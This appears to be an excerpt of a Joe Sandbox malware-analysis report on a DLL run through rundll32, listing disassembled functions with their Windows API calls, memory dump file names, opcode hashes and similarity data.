                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                                  • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                                  • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePeek$H_prolog3
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3998274959-0
                                                                                                                                  • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                  • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                                  • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                  • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                                    • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                                    • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                                  • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1532457625-0
                                                                                                                                  • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                  • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                                  • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                  • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                                    • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                                  • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                                  • _strtol.LIBCMT ref: 10022CB5
                                                                                                                                  • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                                    • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4211061542-0
                                                                                                                                  • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                  • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                                  • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                  • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253174383-0
                                                                                                                                  • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                  • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                                  • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                  • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2161412305-0
                                                                                                                                  • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                  • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                                  • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                  • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                                    • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                                    • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                  • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1615547351-0
                                                                                                                                  • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                  • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                                  • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                  • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                                  • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindFreeLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1078018258-0
                                                                                                                                  • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                  • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                                  • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                  • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                                    • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                                  • __strdup.LIBCMT ref: 1001514C
                                                                                                                                  • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4206445780-0
                                                                                                                                  • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                  • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                                  • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                  • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                                  • _swprintf.LIBCMT ref: 10017768
                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4210924919-0
                                                                                                                                  • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                  • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                                  • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                  • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                                  • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindFreeLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1078018258-0
                                                                                                                                  • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                  • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                                  • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                  • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3354205298-0
                                                                                                                                  • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                                  • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                                  • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                                  • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                                  • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                                  • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3704204646-0
                                                                                                                                  • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                  • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                                  • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                  • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetFocus.USER32 ref: 10015607
                                                                                                                                  • GetParent.USER32(?), ref: 10015615
                                                                                                                                  • SendMessageA.USER32 ref: 10015628
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4211600527-0
                                                                                                                                  • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                  • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                                  • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                  • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2353593579-0
                                                                                                                                  • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
